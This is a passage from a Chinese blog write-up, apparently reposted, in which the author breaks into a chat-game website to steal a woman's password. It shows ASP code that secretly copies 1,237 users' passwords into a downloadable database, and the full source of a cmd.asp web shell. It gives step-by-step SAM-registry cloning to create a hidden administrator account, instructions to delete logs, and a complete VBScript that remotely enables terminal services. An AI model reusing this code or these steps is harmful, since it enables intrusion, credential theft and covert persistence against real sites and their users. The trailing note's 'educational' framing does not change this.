rs.open "SELECT * FROM 用戶密碼 WHERE 用戶名='" & name & "'",conn
If not(Rs.Bof OR Rs.Eof) Then
sql="Update 用戶密碼 Set 密碼='" & password & "'" & "where 用戶名='" & name & "'"
conn.Execute sql
rs.close
set rs=nothing
conn.close
set conn=nothing? ?? ???
else
sql="Insert Into 用戶密碼 (用戶名,密碼,oicq) Values("
sql=sql & "'" & name & "'" & ","
sql=sql & "'" & password & "'" & ","
sql=sql & "'" & useroicq & "'" & ")"
conn.Execute sql
rs.close
set rs=nothing
conn.close
set conn=nothing
end if
.............
'我上面加的程序都是在對方操作江湖數據庫之前的,這樣是為了防止同時操作兩個數據庫時出錯
'下面就是對方第一段開始操作數據庫的程序
'由于大家都是菜鳥,所以一點經驗之談就是,先在自己機子上測試好了,再傳!!!
Set conn=Server.CreateObject("ADODB.CONNECTION")
Set rs=Server.CreateObject("ADODB.RecordSet")
conn.open Application("sjjh_usermdb")
.........
至此,漫長的等待開始了............
15 道數學題過后
.........
現在激動人心的時刻到來了,下載 .
改為 1.mdb 打開之后...........找到了她----- *** 的密碼,哈哈,她的密碼果然和QQ密碼一樣^O^
經過測試(前100個密碼,實有1237個用戶密碼), 竟然有5個人的QQ密碼和江湖密碼一樣(由于用戶的QQ號可能
是亂填,因此可能更多,最好的辦法,跟他們聊聊問問QQ號),對QQ密碼的重視程度看來也不是很大,估計也沒
有申請密碼保護,試了試,有2個人沒有申請,呵呵.........開心吧
至此,既高興又傷心,高興的是我得到了她的密碼,傷心的是有N多的互聯網用戶對密碼的重視程度或者密碼安
全意識薄弱(有的密碼很復雜,但是QQ密碼和聊天室密碼仍然一樣),還好,我不是戀Q狂^-^
好,現在是后門,安一個cmd.asp 到 d:\www\xajh\p_w_picpaths\config.asp.
代碼見附錄,可以通過[url]http://xajh.xxx.com/p_w_picpaths/config.asp[/url] 執行WEB命令
大家一定注意到我沒有使用克隆的管理員帳號,是因為由于克隆的管理員帳員都使用了同樣的profiles,因此
如果你不小心留了點什么記錄(比如有些人喜歡在運行那打命令),那樣會很容易引起管理員發現.因此慎用克
隆的管理員帳號,但還是應該建立一個隱藏的管理員帳號作為后門.
先建立 InternetUser$ 用戶
c:\>net user InternetUser$ password123 /add
//后面加$ 是為了使在 控制臺下用 net user 看不到.
然后運行regedt32.exe(注意不是regedit.exe)
先找到HKEY_LOCAL_MAICHINE\SAM\SAM 點擊它 ,然后在菜單"安全"->"權限" 添加自己現在登錄的帳戶或組,
把"權限"->"完全控制"->"允許"打上勾,然后確定.
(比如剛才我們用guest登錄,但它已經是administrators組的了,因此需要把ADMINISTRATORS組的也改為允許
完全控制,而且下面的鍵,Domains,account,user都要逐級這樣做.但如果前面沒有更改guest用戶的默認組,這
里就沒必要這么麻煩,一級一級的了)這樣就可以直接讀取本地sam的信息
現在運行regedit.exe
打開鍵 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\InternetUser$
查看默認鍵值為"0x3f1" 相應導出如下
HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\ASPNET$ 為InternetUser$.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 為 3f1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 為 lf4.reg (Administrators的相應鍵)
用記事本打開lf4.reg 找到如下的"F"的值,比如這個例子中如下
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
??00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
??f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
??00,00,00,00,00,00,00
把其復制后,打開3f1.reg,找到"F"的值,將其刪除,然后把上面的那段粘貼.
打開aspnet$.reg,把里面的內容,比如這個例子中如下面這段復制
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\InternetUser$]
@=hex(3f1):
回到3f1.reg 粘貼上面這段到文件最后,最后生成的文件內容如下
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
??00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
??f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
??00,00,00,00,00,00,00
"V"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,\
??00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\
??14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\
??01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,\
??00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,\
??00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,\
??08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,\
??00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\
??00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\
??00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\
??00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
??00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,\
??00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\
??00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\
??00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,\
??e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\
??00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,\
??00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,\
??4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,\
??76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\
??ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,\
??fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,\
??37,f1,02,cf,01,00,01,00,01,00,01,00
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\InternetUser$]
@=hex(3f1):
保存后,將InternetUser$用戶刪除
c:\>net user InternetUser$ /delete
運行regedit.exe 將我們已經修改好的3f1.reg文件導入.
最后,打開regedt32.exe 找到HKEY_LOCAL_MAICHINE\SAM\SAM 點擊它 ,然后在菜單"安全"->"權限" 刪除剛才
添加的用戶(比如剛才剛才是用的guest,而且改了Administrators組的設置,所以與前面對應,Administratos
組也要改,而且SAM下面的鍵,Domains,account,user都要逐級這樣做,但如果前面沒有改guest用戶的默認組,
這里沒必要這么麻煩,一級一級的了).
這樣,我們就建立了一個在控制臺用 net user 和"計算機管理"中都看不到的帳戶InternetUser$,但是不能改
密碼,一改密碼就會在"計算機管理"中看到.需要注意的一點是,每次登錄(不論是不是克隆的),都最好注銷掉,
而不是直接關閉窗口,否則在"終端服務管理器"中會看到,而且管理員登錄后注銷時,可能會發現一個問題就是
,怎么會是"注銷InternetUser$..."!!! (我克隆了兩個帳號,測試的,沒有測試過Administrators)
然后是記錄清理,由于整個過程有下載的過程被記錄,因此,運行logfiles,刪除相關文件中的記錄即可.
本人水平糟糕,一定有錯誤和遺漏的地方,這文都改了N次,所以望高手批評指正.
附錄:
--------------------------------------------------
以下是asp后門,存為 cmd.asp
<%@ Language=VBScript %>
<%
??Dim oScript
??Dim oScriptNet
??Dim oFileSys, oFile
??Dim szCMD, szTempFile
??On Error Resume Next
??' -- create the COM objects that we will be using -- '
??Set oScript = Server.CreateObject("WSCRIPT.SHELL")
??Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
??Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
??' -- check for a command that we have posted -- '
??szCMD = Request.Form(".CMD")
??If (szCMD <> "") Then
? ? ' -- Use a poor man's pipe ... a temp file -- '
? ? szTempFile = "C:\" & oFileSys.GetTempName( )
? ? Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
? ? Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
??End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="OST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<RE>
<%
??If (IsObject(oFile)) Then
? ? ' -- Read the output from our command and remove the temp file -- '
? ? On Error Resume Next
? ? Response.Write Server.HTMLEncode(oFile.ReadAll)
? ? oFile.Close
? ?Call oFileSys.DeleteFile(szTempFile, True)
??End If
%>
</BODY>
</HTML>
----------------------------------------------------------------------
以下是開終端的腳本,引自caozhe(草哲) 的<<一次簡單的3389***過程 >>,把它存為rots.vbe
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
if (lcase(right(wscript.fullname,11))="wscript.exe") then
??set objShell=wscript.createObject("wscript.shell")
??objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
??wscript.quit
end if
if wscript.arguments.count<3 then
??usage()
??wscript.echo "Not enough parameters."
??wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
??port=wscript.arguments(3)
else
??port=3389
end if
if not isnumeric(port) or port<1 or port>65000 then
??wscript.echo "The number of port is error."
??wscript.quit
end if
if wscript.arguments.count>4 then
??reboot=wscript.arguments(4)
else
??reboot=""
end if
usage()
outstreem.write "Conneting "&ipaddress&" ...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
outstreem.write "Checking OS type...."
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
??if instr(objinstoscaption.caption,"Server")>0 then
? ? wscript.echo "OK!"
??else
? ? wscript.echo "OS type is "&objinstoscaption.caption
? ? outstreem.write "Do you want to cancel setup?[y/n]"
? ? strcancel=instreem.readline
? ? if lcase(strcancel)<>"n" then wscript.quit
??end if
next
outstreem.write "Writing into registry ...."
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get
("stdregprov")
HKLM=&h80000002
HKU=&h80000003
with objinstreg
.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
.setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-
Tcp","ortNumber",port
end with
showerror(err.number)
rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
if flag<>0 then
??outstreem.write "Now, reboot target...."
??strwqlquery="select * from win32_operatingsystem where primary='true'"
??set colinstances=objswbemservices.execquery(strwqlquery)
??for each objinstance in colinstances
? ? objinstance.win32shutdown(flag)
??next
??showerror(err.number)
else
??wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"
function showerror(errornumber)
if errornumber Then
??wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
??if err.description <> "" then
? ? wscript.echo "Error description: "&err.description&"."
??end if
??wscript.quit
else
??wscript.echo "OK!"
end if
end function
function usage()
wscript.echo string(79,"*")
wscript.echo "ROTS v1.05"
wscript.echo "Remote Open Terminal services Script, by 草哲"
wscript.echo "Welcome to visite [url]www.5458.net[/url]"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
wscript.echo "port: default number is 3389."
wscript.echo "/r: auto reboot target."
wscript.echo "/fr: auto force reboot target."
wscript.echo string(79,"*")&vbcrlf
end function
root注:本文對于網絡安全初學者而言,或許會有幫助,雖然采用的方法比較簡單,但有助于了解***者的思路和方法流程,當然,不是鼓勵大家這么干
轉載于:https://blog.51cto.com/181796968/41936
總結
- 上一篇: DICOM文件格式与编程(转)
- 下一篇: 你肩膀上有蜻蜓吗?